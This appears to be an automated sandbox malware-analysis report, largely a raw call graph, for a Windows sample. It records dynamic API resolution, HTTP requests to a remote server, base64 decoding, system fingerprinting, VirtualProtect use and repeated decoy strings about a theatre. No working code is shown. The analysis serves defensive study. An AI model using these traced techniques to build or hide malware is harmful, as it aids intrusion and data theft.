d3834 37224->37225 37226 d4610 2 API calls 37225->37226 37227 d384d 37226->37227 37228 d4610 2 API calls 37227->37228 37229 d3866 37228->37229 37230 d4610 2 API calls 37229->37230 37231 d387f 37230->37231 37232 d4610 2 API calls 37231->37232 37233 d3898 37232->37233 37234 d4610 2 API calls 37233->37234 37235 d38b1 37234->37235 37236 d4610 2 API calls 37235->37236 37237 d38ca 37236->37237 37238 d4610 2 API calls 37237->37238 37239 d38e3 37238->37239 37240 d4610 2 API calls 37239->37240 37241 d38fc 37240->37241 37242 d4610 2 API calls 37241->37242 37243 d3915 37242->37243 37244 d4610 2 API calls 37243->37244 37245 d392e 37244->37245 37246 d4610 2 API calls 37245->37246 37247 d3947 37246->37247 37248 d4610 2 API calls 37247->37248 37249 d3960 37248->37249 37250 d4610 2 API calls 37249->37250 37251 d3979 37250->37251 37252 d4610 2 API calls 37251->37252 37253 d3992 37252->37253 37254 d4610 2 API calls 37253->37254 37255 d39ab 37254->37255 37256 d4610 2 API calls 37255->37256 37257 d39c4 37256->37257 37258 d4610 2 API calls 37257->37258 37259 d39dd 37258->37259 37260 d4610 2 API calls 37259->37260 37261 d39f6 37260->37261 37262 d4610 2 API calls 37261->37262 37263 d3a0f 37262->37263 37264 d4610 2 API calls 37263->37264 37265 d3a28 37264->37265 37266 d4610 2 API calls 37265->37266 37267 d3a41 37266->37267 37268 d4610 2 API calls 37267->37268 37269 d3a5a 37268->37269 37270 d4610 2 API calls 37269->37270 37271 d3a73 37270->37271 37272 d4610 2 API calls 37271->37272 37273 d3a8c 37272->37273 37274 d4610 2 API calls 37273->37274 37275 d3aa5 37274->37275 37276 d4610 2 API calls 37275->37276 37277 d3abe 37276->37277 37278 d4610 2 API calls 37277->37278 37279 d3ad7 37278->37279 37280 d4610 2 API calls 37279->37280 37281 d3af0 37280->37281 37282 d4610 2 API calls 37281->37282 37283 d3b09 37282->37283 37284 d4610 2 API calls 37283->37284 37285 d3b22 37284->37285 37286 d4610 2 API calls 37285->37286 37287 d3b3b 37286->37287 37288 d4610 2 API calls 37287->37288 37289 d3b54 37288->37289 37290 d4610 2 API calls 37289->37290 37291 d3b6d 37290->37291 37292 d4610 2 API calls 37291->37292 37293 d3b86 37292->37293 37294 d4610 2 API calls 37293->37294 37295 d3b9f 37294->37295 37296 d4610 2 API calls 37295->37296 37297 d3bb8 37296->37297 37298 d4610 2 API calls 37297->37298 37299 d3bd1 37298->37299 37300 d4610 2 API calls 37299->37300 37301 d3bea 37300->37301 37302 d4610 2 API calls 37301->37302 37303 d3c03 37302->37303 37304 d4610 2 API calls 37303->37304 37305 d3c1c 37304->37305 37306 d4610 2 API calls 37305->37306 37307 d3c35 37306->37307 37308 d4610 2 API calls 37307->37308 37309 d3c4e 37308->37309 37310 d4610 2 API calls 37309->37310 37311 d3c67 37310->37311 37312 d4610 2 API calls 37311->37312 37313 d3c80 37312->37313 37314 d4610 2 API calls 37313->37314 37315 d3c99 37314->37315 37316 d4610 2 API calls 37315->37316 37317 d3cb2 37316->37317 37318 d4610 2 API calls 37317->37318 37319 d3ccb 37318->37319 37320 d4610 2 API calls 37319->37320 37321 d3ce4 37320->37321 37322 d4610 2 API calls 37321->37322 37323 d3cfd 37322->37323 37324 d4610 2 API calls 37323->37324 37325 d3d16 37324->37325 37326 d4610 2 API calls 37325->37326 37327 d3d2f 37326->37327 37328 d4610 2 API calls 37327->37328 37329 d3d48 37328->37329 37330 d4610 2 API calls 37329->37330 37331 d3d61 37330->37331 37332 d4610 2 API calls 37331->37332 37333 d3d7a 37332->37333 37334 d4610 2 API calls 37333->37334 37335 d3d93 37334->37335 37336 d4610 2 API calls 37335->37336 37337 d3dac 37336->37337 37338 d4610 2 API calls 37337->37338 37339 d3dc5 37338->37339 37340 d4610 2 API calls 37339->37340 37341 d3dde 37340->37341 37342 d4610 2 API calls 37341->37342 37343 d3df7 37342->37343 37344 d4610 2 API calls 37343->37344 37345 d3e10 37344->37345 37346 d4610 2 API calls 37345->37346 37347 d3e29 37346->37347 37348 d4610 2 API calls 37347->37348 37349 d3e42 37348->37349 37350 d4610 2 API calls 37349->37350 37351 d3e5b 37350->37351 37352 d4610 2 API calls 37351->37352 37353 d3e74 37352->37353 37354 d4610 2 API calls 37353->37354 37355 d3e8d 37354->37355 37356 d4610 2 API calls 37355->37356 37357 d3ea6 37356->37357 37358 d4610 2 API calls 37357->37358 37359 d3ebf 37358->37359 37360 d4610 2 API calls 37359->37360 37361 d3ed8 37360->37361 37362 d4610 2 API calls 37361->37362 37363 d3ef1 37362->37363 37364 d4610 2 API calls 37363->37364 37365 d3f0a 37364->37365 37366 d4610 2 API calls 37365->37366 37367 d3f23 37366->37367 37368 d4610 2 API calls 37367->37368 37369 d3f3c 37368->37369 37370 d4610 2 API calls 37369->37370 37371 d3f55 37370->37371 37372 d4610 2 API calls 37371->37372 37373 d3f6e 37372->37373 37374 d4610 2 API calls 37373->37374 37375 d3f87 37374->37375 37376 d4610 2 API calls 37375->37376 37377 d3fa0 37376->37377 37378 d4610 2 API calls 37377->37378 37379 d3fb9 37378->37379 37380 d4610 2 API calls 37379->37380 37381 d3fd2 37380->37381 37382 d4610 2 API calls 37381->37382 37383 d3feb 37382->37383 37384 d4610 2 API calls 37383->37384 37385 d4004 37384->37385 37386 d4610 2 API calls 37385->37386 37387 d401d 37386->37387 37388 d4610 2 API calls 37387->37388 37389 d4036 37388->37389 37390 d4610 2 API calls 37389->37390 37391 d404f 37390->37391 37392 d4610 2 API calls 37391->37392 37393 d4068 37392->37393 37394 d4610 2 API calls 37393->37394 37395 d4081 37394->37395 37396 d4610 2 API calls 37395->37396 37397 d409a 37396->37397 37398 d4610 2 API calls 37397->37398 37399 d40b3 37398->37399 37400 d4610 2 API calls 37399->37400 37401 d40cc 37400->37401 37402 d4610 2 API calls 37401->37402 37403 d40e5 37402->37403 37404 d4610 2 API calls 37403->37404 37405 d40fe 37404->37405 37406 d4610 2 API calls 37405->37406 37407 d4117 37406->37407 37408 d4610 2 API calls 37407->37408 37409 d4130 37408->37409 37410 d4610 2 API calls 37409->37410 37411 d4149 37410->37411 37412 d4610 2 API calls 37411->37412 37413 d4162 37412->37413 37414 d4610 2 API calls 37413->37414 37415 d417b 37414->37415 37416 d4610 2 API calls 37415->37416 37417 d4194 37416->37417 37418 d4610 2 API calls 37417->37418 37419 d41ad 37418->37419 37420 d4610 2 API calls 37419->37420 37421 d41c6 37420->37421 37422 d4610 2 API calls 37421->37422 37423 d41df 37422->37423 37424 d4610 2 API calls 37423->37424 37425 d41f8 37424->37425 37426 d4610 2 API calls 37425->37426 37427 d4211 37426->37427 37428 d4610 2 API calls 37427->37428 37429 d422a 37428->37429 37430 d4610 2 API calls 37429->37430 37431 d4243 37430->37431 37432 d4610 2 API calls 37431->37432 37433 d425c 37432->37433 37434 d4610 2 API calls 37433->37434 37435 d4275 37434->37435 37436 d4610 2 API calls 37435->37436 37437 d428e 37436->37437 37438 d4610 2 API calls 37437->37438 37439 d42a7 37438->37439 37440 d4610 2 API calls 37439->37440 37441 d42c0 37440->37441 37442 d4610 2 API calls 37441->37442 37443 d42d9 37442->37443 37444 d4610 2 API calls 37443->37444 37445 d42f2 37444->37445 37446 d4610 2 API calls 37445->37446 37447 d430b 37446->37447 37448 d4610 2 API calls 37447->37448 37449 d4324 37448->37449 37450 d4610 2 API calls 37449->37450 37451 d433d 37450->37451 37452 d4610 2 API calls 37451->37452 37453 d4356 37452->37453 37454 d4610 2 API calls 37453->37454 37455 d436f 37454->37455 37456 d4610 2 API calls 37455->37456 37457 d4388 37456->37457 37458 d4610 2 API calls 37457->37458 37459 d43a1 37458->37459 37460 d4610 2 API calls 37459->37460 37461 d43ba 37460->37461 37462 d4610 2 API calls 37461->37462 37463 d43d3 37462->37463 37464 d4610 2 API calls 37463->37464 37465 d43ec 37464->37465 37466 d4610 2 API calls 37465->37466 37467 d4405 37466->37467 37468 d4610 2 API calls 37467->37468 37469 d441e 37468->37469 37470 d4610 2 API calls 37469->37470 37471 d4437 37470->37471 37472 d4610 2 API calls 37471->37472 37473 d4450 37472->37473 37474 d4610 2 API calls 37473->37474 37475 d4469 37474->37475 37476 d4610 2 API calls 37475->37476 37477 d4482 37476->37477 37478 d4610 2 API calls 37477->37478 37479 d449b 37478->37479 37480 d4610 2 API calls 37479->37480 37481 d44b4 37480->37481 37482 d4610 2 API calls 37481->37482 37483 d44cd 37482->37483 37484 d4610 2 API calls 37483->37484 37485 d44e6 37484->37485 37486 d4610 2 API calls 37485->37486 37487 d44ff 37486->37487 37488 d4610 2 API calls 37487->37488 37489 d4518 37488->37489 37490 d4610 2 API calls 37489->37490 37491 d4531 37490->37491 37492 d4610 2 API calls 37491->37492 37493 d454a 37492->37493 37494 d4610 2 API calls 37493->37494 37495 d4563 37494->37495 37496 d4610 2 API calls 37495->37496 37497 d457c 37496->37497 37498 d4610 2 API calls 37497->37498 37499 d4595 37498->37499 37500 d4610 2 API calls 37499->37500 37501 d45ae 37500->37501 37502 d4610 2 API calls 37501->37502 37503 d45c7 37502->37503 37504 d4610 2 API calls 37503->37504 37505 d45e0 37504->37505 37506 d4610 2 API calls 37505->37506 37507 d45f9 37506->37507 37508 e9f20 37507->37508 37509 ea346 8 API calls 37508->37509 37510 e9f30 43 API calls 37508->37510 37511 ea3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37509->37511 37512 ea456 37509->37512 37510->37509 37511->37512 37513 ea526 37512->37513 37514 ea463 8 API calls 37512->37514 37515 ea52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37513->37515 37516 ea5a8 37513->37516 37514->37513 37515->37516 37517 ea647 37516->37517 37518 ea5b5 6 API calls 37516->37518 37519 ea72f 37517->37519 37520 ea654 9 API calls 37517->37520 37518->37517 37521 ea738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37519->37521 37522 ea7b2 37519->37522 37520->37519 37521->37522 37523 ea7ec 37522->37523 37524 ea7bb GetProcAddress GetProcAddress 37522->37524 37525 ea825 37523->37525 37526 ea7f5 GetProcAddress GetProcAddress 37523->37526 37524->37523 37527 ea922 37525->37527 37528 ea832 10 API calls 37525->37528 37526->37525 37529 ea98d 37527->37529 37530 ea92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37527->37530 37528->37527 37531 ea9ae 37529->37531 37532 ea996 GetProcAddress 37529->37532 37530->37529 37533 e5ef3 37531->37533 37534 ea9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37531->37534 37532->37531 37535 d1590 37533->37535 37534->37533 37805 d16b0 37535->37805 37538 eaab0 lstrcpy 37539 d15b5 37538->37539 37540 eaab0 lstrcpy 37539->37540 37541 d15c7 37540->37541 37542 eaab0 lstrcpy 37541->37542 37543 d15d9 37542->37543 37544 eaab0 lstrcpy 37543->37544 37545 d1663 37544->37545 37546 e5760 37545->37546 37547 e5771 37546->37547 37548 eab30 2 API calls 37547->37548 37549 e577e 37548->37549 37550 eab30 2 API calls 37549->37550 37551 e578b 37550->37551 37552 eab30 2 API calls 37551->37552 37553 e5798 37552->37553 37554 eaa50 lstrcpy 37553->37554 37555 e57a5 37554->37555 37556 eaa50 lstrcpy 37555->37556 37557 e57b2 37556->37557 37558 eaa50 lstrcpy 37557->37558 37559 e57bf 37558->37559 37560 eaa50 lstrcpy 37559->37560 37600 e57cc 37560->37600 37561 eaa50 lstrcpy 37561->37600 37562 e5893 StrCmpCA 37562->37600 37563 e58f0 StrCmpCA 37564 e5a2c 37563->37564 37563->37600 37565 eabb0 lstrcpy 37564->37565 37566 e5a38 37565->37566 37567 eab30 2 API calls 37566->37567 37568 e5a46 37567->37568 37571 eab30 2 API calls 37568->37571 37569 e5aa6 StrCmpCA 37572 e5be1 37569->37572 37569->37600 37570 e5440 20 API calls 37570->37600 37574 e5a55 37571->37574 37573 eabb0 lstrcpy 37572->37573 37575 e5bed 37573->37575 37576 d16b0 lstrcpy 37574->37576 37577 eab30 2 API calls 37575->37577 37596 e5a61 37576->37596 37579 e5bfb 37577->37579 37578 eab30 lstrlen lstrcpy 37578->37600 37582 eab30 2 API calls 37579->37582 37580 e5c5b StrCmpCA 37583 e5c78 37580->37583 37584 e5c66 Sleep 37580->37584 37581 e5510 25 API calls 37581->37600 37586 e5c0a 37582->37586 37587 eabb0 lstrcpy 37583->37587 37584->37600 37585 eaab0 lstrcpy 37585->37600 37588 d16b0 lstrcpy 37586->37588 37589 e5c84 37587->37589 37588->37596 37590 eab30 2 API calls 37589->37590 37591 e5c93 37590->37591 37592 eab30 2 API calls 37591->37592 37594 e5ca2 37592->37594 37593 e59da StrCmpCA 37593->37600 37595 d16b0 lstrcpy 37594->37595 37595->37596 37596->36653 37597 e5b8f StrCmpCA 37597->37600 37598 eabb0 lstrcpy 37598->37600 37599 d1590 lstrcpy 37599->37600 37600->37561 37600->37562 37600->37563 37600->37569 37600->37570 37600->37578 37600->37580 37600->37581 37600->37585 37600->37593 37600->37597 37600->37598 37600->37599 37602 e76dc 37601->37602 37603 e76e3 GetVolumeInformationA 37601->37603 37602->37603 37604 e7721 37603->37604 37605 e778c GetProcessHeap RtlAllocateHeap 37604->37605 37606 e77b8 wsprintfA 37605->37606 37607 e77a9 37605->37607 37609 eaa50 lstrcpy 37606->37609 37608 eaa50 lstrcpy 37607->37608 37610 e5ff7 37608->37610 37609->37610 37610->36674 37612 eaab0 lstrcpy 37611->37612 37613 d48e9 37612->37613 37814 d4800 37613->37814 37615 d48f5 37616 eaa50 lstrcpy 37615->37616 37617 d4927 37616->37617 37618 eaa50 lstrcpy 37617->37618 37619 d4934 37618->37619 37620 eaa50 lstrcpy 37619->37620 37621 d4941 37620->37621 37622 eaa50 lstrcpy 37621->37622 37623 d494e 37622->37623 37624 eaa50 lstrcpy 37623->37624 37625 d495b InternetOpenA StrCmpCA 37624->37625 37626 d4994 37625->37626 37627 d4f1b InternetCloseHandle 37626->37627 37820 e8cf0 37626->37820 37628 d4f38 37627->37628 37835 da210 CryptStringToBinaryA 37628->37835 37630 d49b3 37828 eac30 37630->37828 37633 d49c6 37635 eabb0 lstrcpy 37633->37635 37640 d49cf 37635->37640 37636 eab30 2 API calls 37637 d4f55 37636->37637 37638 eacc0 4 API calls 37637->37638 37641 d4f6b 37638->37641 37639 d4f77 ctype 37642 eaab0 lstrcpy 37639->37642 37644 eacc0 4 API calls 37640->37644 37643 eabb0 lstrcpy 37641->37643 37655 d4fa7 37642->37655 37643->37639 37645 d49f9 37644->37645 37646 eabb0 lstrcpy 37645->37646 37647 d4a02 37646->37647 37648 eacc0 4 API calls 37647->37648 37649 d4a21 37648->37649 37650 eabb0 lstrcpy 37649->37650 37651 d4a2a 37650->37651 37652 eac30 3 API calls 37651->37652 37653 d4a48 37652->37653 37654 eabb0 lstrcpy 37653->37654 37656 d4a51 37654->37656 37655->36677 37657 eacc0 4 API calls 37656->37657 37658 d4a70 37657->37658 37659 eabb0 lstrcpy 37658->37659 37660 d4a79 37659->37660 37661 eacc0 4 API calls 37660->37661 37662 d4a98 37661->37662 37663 eabb0 lstrcpy 37662->37663 37664 d4aa1 37663->37664 37665 eacc0 4 API calls 37664->37665 37666 d4acd 37665->37666 37667 eac30 3 API calls 37666->37667 37668 d4ad4 37667->37668 37669 eabb0 lstrcpy 37668->37669 37670 d4add 37669->37670 37671 d4af3 InternetConnectA 37670->37671 37671->37627 37672 d4b23 HttpOpenRequestA 37671->37672 37674 d4f0e InternetCloseHandle 37672->37674 37675 d4b78 37672->37675 37674->37627 37676 eacc0 4 API calls 37675->37676 37677 d4b8c 37676->37677 37678 eabb0 lstrcpy 37677->37678 37679 d4b95 37678->37679 37680 eac30 3 API calls 37679->37680 37681 d4bb3 37680->37681 37682 eabb0 lstrcpy 37681->37682 37683 d4bbc 37682->37683 37684 eacc0 4 API calls 37683->37684 37685 d4bdb 37684->37685 37686 eabb0 lstrcpy 37685->37686 37687 d4be4 37686->37687 37688 eacc0 4 API calls 37687->37688 37689 d4c05 37688->37689 37690 eabb0 lstrcpy 37689->37690 37691 d4c0e 37690->37691 37692 eacc0 4 API calls 37691->37692 37693 d4c2e 37692->37693 37694 eabb0 lstrcpy 37693->37694 37695 d4c37 37694->37695 37696 eacc0 4 API calls 37695->37696 37697 d4c56 37696->37697 37698 eabb0 lstrcpy 37697->37698 37699 d4c5f 37698->37699 37700 eac30 3 API calls 37699->37700 37701 d4c7d 37700->37701 37702 eabb0 lstrcpy 37701->37702 37703 d4c86 37702->37703 37704 eacc0 4 API calls 37703->37704 37705 d4ca5 37704->37705 37706 eabb0 lstrcpy 37705->37706 37707 d4cae 37706->37707 37708 eacc0 4 API calls 37707->37708 37709 d4ccd 37708->37709 37710 eabb0 lstrcpy 37709->37710 37711 d4cd6 37710->37711 37712 eac30 3 API calls 37711->37712 37713 d4cf4 37712->37713 37714 eabb0 lstrcpy 37713->37714 37715 d4cfd 37714->37715 37716 eacc0 4 API calls 37715->37716 37717 d4d1c 37716->37717 37718 eabb0 lstrcpy 37717->37718 37719 d4d25 37718->37719 37720 eacc0 4 API calls 37719->37720 37721 d4d46 37720->37721 37722 eabb0 lstrcpy 37721->37722 37723 d4d4f 37722->37723 37724 eacc0 4 API calls 37723->37724 37725 d4d6f 37724->37725 37726 eabb0 lstrcpy 37725->37726 37727 d4d78 37726->37727 37728 eacc0 4 API calls 37727->37728 37729 d4d97 37728->37729 37730 eabb0 lstrcpy 37729->37730 37731 d4da0 37730->37731 37732 eac30 3 API calls 37731->37732 37733 d4dbe 37732->37733 37734 eabb0 lstrcpy 37733->37734 37735 d4dc7 37734->37735 37736 eaa50 lstrcpy 37735->37736 37737 d4de2 37736->37737 37738 eac30 3 API calls 37737->37738 37739 d4e03 37738->37739 37740 eac30 3 API calls 37739->37740 37741 d4e0a 37740->37741 37742 eabb0 lstrcpy 37741->37742 37743 d4e16 37742->37743 37744 d4e37 lstrlen 37743->37744 37745 d4e4a 37744->37745 37746 d4e53 lstrlen 37745->37746 37834 eade0 37746->37834 37748 d4e63 HttpSendRequestA 37749 d4e82 InternetReadFile 37748->37749 37750 d4eb7 InternetCloseHandle 37749->37750 37755 d4eae 37749->37755 37753 eab10 37750->37753 37752 eacc0 4 API calls 37752->37755 37753->37674 37754 eabb0 lstrcpy 37754->37755 37755->37749 37755->37750 37755->37752 37755->37754 37841 eade0 37756->37841 37758 e1a14 StrCmpCA 37759 e1a1f ExitProcess 37758->37759 37761 e1a27 37758->37761 37760 e1c12 37760->36679 37761->37760 37762 e1acf StrCmpCA 37761->37762 37763 e1aad StrCmpCA 37761->37763 37764 e1b82 StrCmpCA 37761->37764 37765 e1b63 StrCmpCA 37761->37765 37766 e1bc0 StrCmpCA 37761->37766 37767 e1b41 StrCmpCA 37761->37767 37768 e1ba1 StrCmpCA 37761->37768 37769 e1b1f StrCmpCA 37761->37769 37770 e1afd StrCmpCA 37761->37770 37771 eab30 lstrlen lstrcpy 37761->37771 37762->37761 37763->37761 37764->37761 37765->37761 37766->37761 37767->37761 37768->37761 37769->37761 37770->37761 37771->37761 37772->36685 37773->36687 37774->36693 37775->36695 37776->36701 37777->36703 37778->36707 37779->36711 37780->36715 37781->36721 37782->36723 37783->36727 37784->36741 37785->36744 37786->36745 37787->36740 37788->36745 37789->36760 37790->36748 37791->36751 37792->36754 37793->36757 37794->36762 37795->36764 37796->36771 37797->36777 37798->36798 37799->36802 37800->36801 37801->36797 37802->36801 37803->36811 37806 eaab0 lstrcpy 37805->37806 37807 d16c3 37806->37807 37808 eaab0 lstrcpy 37807->37808 37809 d16d5 37808->37809 37810 eaab0 lstrcpy 37809->37810 37811 d16e7 37810->37811 37812 eaab0 lstrcpy 37811->37812 37813 d15a3 37812->37813 37813->37538 37815 d4816 37814->37815 37816 d4888 lstrlen 37815->37816 37840 eade0 37816->37840 37818 d4898 InternetCrackUrlA 37819 d48b7 37818->37819 37819->37615 37821 eaa50 lstrcpy 37820->37821 37822 e8d04 37821->37822 37823 eaa50 lstrcpy 37822->37823 37824 e8d12 GetSystemTime 37823->37824 37825 e8d29 37824->37825 37826 eaab0 lstrcpy 37825->37826 37827 e8d8c 37826->37827 37827->37630 37829 eac41 37828->37829 37830 eac98 37829->37830 37833 eac78 lstrcpy lstrcat 37829->37833 37831 eaab0 lstrcpy 37830->37831 37832 eaca4 37831->37832 37832->37633 37833->37830 37834->37748 37836 da249 LocalAlloc 37835->37836 37837 d4f3e 37835->37837 37836->37837 37838 da264 CryptStringToBinaryA 37836->37838 37837->37636 37837->37639 37838->37837 37839 da289 LocalFree 37838->37839 37839->37837 37840->37818 37841->37758

                            Executed Functions

                            Function 000E9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 e9bb0-e9bc4 call e9aa0 663 e9bca-e9dde call e9ad0 GetProcAddress * 21 660->663 664 e9de3-e9e42 LoadLibraryA * 5 660->664 663->664 666 e9e5d-e9e64 664->666 667 e9e44-e9e58 GetProcAddress 664->667 669 e9e96-e9e9d 666->669 670 e9e66-e9e91 GetProcAddress * 2 666->670 667->666 671 e9e9f-e9eb3 GetProcAddress 669->671 672 e9eb8-e9ebf 669->672 670->669 671->672 673 e9ed9-e9ee0 672->673 674 e9ec1-e9ed4 GetProcAddress 672->674 675 e9ee2-e9f0c GetProcAddress * 2 673->675 676 e9f11-e9f12 673->676 674->673 675->676
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00D42470), ref: 000E9BF1
                            • GetProcAddress.KERNEL32(74DD0000,00D42380), ref: 000E9C0A
                            • GetProcAddress.KERNEL32(74DD0000,00D42500), ref: 000E9C22
                            • GetProcAddress.KERNEL32(74DD0000,00D423B0), ref: 000E9C3A
                            • GetProcAddress.KERNEL32(74DD0000,00D423E0), ref: 000E9C53
                            • GetProcAddress.KERNEL32(74DD0000,00D48F68), ref: 000E9C6B
                            • GetProcAddress.KERNEL32(74DD0000,00D35B10), ref: 000E9C83
                            • GetProcAddress.KERNEL32(74DD0000,00D35D50), ref: 000E9C9C
                            • GetProcAddress.KERNEL32(74DD0000,00D424E8), ref: 000E9CB4
                            • GetProcAddress.KERNEL32(74DD0000,00D42218), ref: 000E9CCC
                            • GetProcAddress.KERNEL32(74DD0000,00D424A0), ref: 000E9CE5
                            • GetProcAddress.KERNEL32(74DD0000,00D42368), ref: 000E9CFD
                            • GetProcAddress.KERNEL32(74DD0000,00D35E50), ref: 000E9D15
                            • GetProcAddress.KERNEL32(74DD0000,00D42410), ref: 000E9D2E
                            • GetProcAddress.KERNEL32(74DD0000,00D424B8), ref: 000E9D46
                            • GetProcAddress.KERNEL32(74DD0000,00D35DD0), ref: 000E9D5E
                            • GetProcAddress.KERNEL32(74DD0000,00D42278), ref: 000E9D77
                            • GetProcAddress.KERNEL32(74DD0000,00D422A8), ref: 000E9D8F
                            • GetProcAddress.KERNEL32(74DD0000,00D35AF0), ref: 000E9DA7
                            • GetProcAddress.KERNEL32(74DD0000,00D42230), ref: 000E9DC0
                            • GetProcAddress.KERNEL32(74DD0000,00D35BD0), ref: 000E9DD8
                            • LoadLibraryA.KERNEL32(00D42518,?,000E6CA0), ref: 000E9DEA
                            • LoadLibraryA.KERNEL32(00D42530,?,000E6CA0), ref: 000E9DFB
                            • LoadLibraryA.KERNEL32(00D42548,?,000E6CA0), ref: 000E9E0D
                            • LoadLibraryA.KERNEL32(00D42560,?,000E6CA0), ref: 000E9E1F
                            • LoadLibraryA.KERNEL32(00D42578,?,000E6CA0), ref: 000E9E30
                            • GetProcAddress.KERNEL32(75A70000,00D425C0), ref: 000E9E52
                            • GetProcAddress.KERNEL32(75290000,00D42590), ref: 000E9E73
                            • GetProcAddress.KERNEL32(75290000,00D425A8), ref: 000E9E8B
                            • GetProcAddress.KERNEL32(75BD0000,00D425D8), ref: 000E9EAD
                            • GetProcAddress.KERNEL32(75450000,00D35B50), ref: 000E9ECE
                            • GetProcAddress.KERNEL32(76E90000,00D48FC8), ref: 000E9EEF
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 000E9F06
                            Strings
                            • NtQueryInformationProcess, xrefs: 000E9EFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: b56de6d53b02d4806cf4801a4f5db3ce99dd71db6e8be56822ccf7ed55482f25
                            • Instruction ID: 7eb3f1c958dd9d4f50df43c5931017bee5e642f87665922689be1485fcb1b049
                            • Opcode Fuzzy Hash: b56de6d53b02d4806cf4801a4f5db3ce99dd71db6e8be56822ccf7ed55482f25
                            • Instruction Fuzzy Hash: 3BA1FDB66182009FC346DFA9EDC9A667BFDA78F701F148A1AB909C3270D7349941CF60
                            Function 000D4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 d4610-d46e5 RtlAllocateHeap 781 d46f0-d46f6 764->781 782 d46fc-d479a 781->782 783 d479f-d47f9 VirtualProtect 781->783 782->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D465E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000D47EC
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D479F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46FC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47AA
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47C0
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4693
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46C8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D476E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46BD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46D3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4667
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4784
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47B5
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4728
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46A7
